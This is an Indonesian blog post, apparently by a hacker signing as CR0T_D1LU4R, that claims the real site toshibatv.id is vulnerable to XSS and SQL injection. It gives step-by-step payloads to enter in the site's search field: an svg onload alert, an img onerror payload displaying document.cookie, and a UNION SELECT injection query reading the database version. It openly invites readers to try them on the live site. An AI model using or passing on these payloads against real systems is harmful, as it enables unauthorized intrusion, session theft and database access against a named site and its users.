- Get link
- Other Apps
siapa si yang ga kenal toshibatv.id ? yang selama ini kita temuin itu merek di tv atau dimana mana yah
oke jadi karna gua dah lama ga upload artikel, disini gua mau ngasih tau ke kalian kalo di website toshibatv.id itu VULN XSS dan SQL Injection.
oke jangan banyak bacot yah kan langsung aja buka website toshibatv.id
disini kita akan bongkar bug XSS nya terlebih dahulu yah gaes
- XSS dengan Payload "><svg/onload=alert("XSS")><"
masukan payload tersbut di colum search yang nantinya akan muncul pop ini seperti di bawah ini.
- XSS get Cookiee dengan Payload <img src=asdf onerror=alert(document.cookie)>
masukan payload tersebut di colum search yang nanti nya akan muncul pop up seperti di bawah ini.
Klik disini
Oke sekarang kita mulai SQL Injection pada site toshiba.tv
yang pertama kalian lakukan order by -- - pada colum seacrh toshibatv.id
jika sudah menemukan angka togel nya baru kalian union select dengan sedikit bypas pada union select
atau kalian bisa coba dengan query yang saya pake
.' union distinctROW select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- +
nah query di atas kalian masukin di colum search yang nanti nya akan keluar angka togel seperti di bawah ini
nah nanti akan keluar togel seperti itu dan disini saya hanya mengecek version dari website toshibatv.id tersebut yah gaes, jika kalian ingin mencoba silakan
dan jika kalian ingin repost sertakan orang yang memposting pertama kalinya
#Author ./CR0T_D1LU4R
yang mau bertanya tanya silakan hubungi gua yang tampan ini, Klik disini
Comments
Post a Comment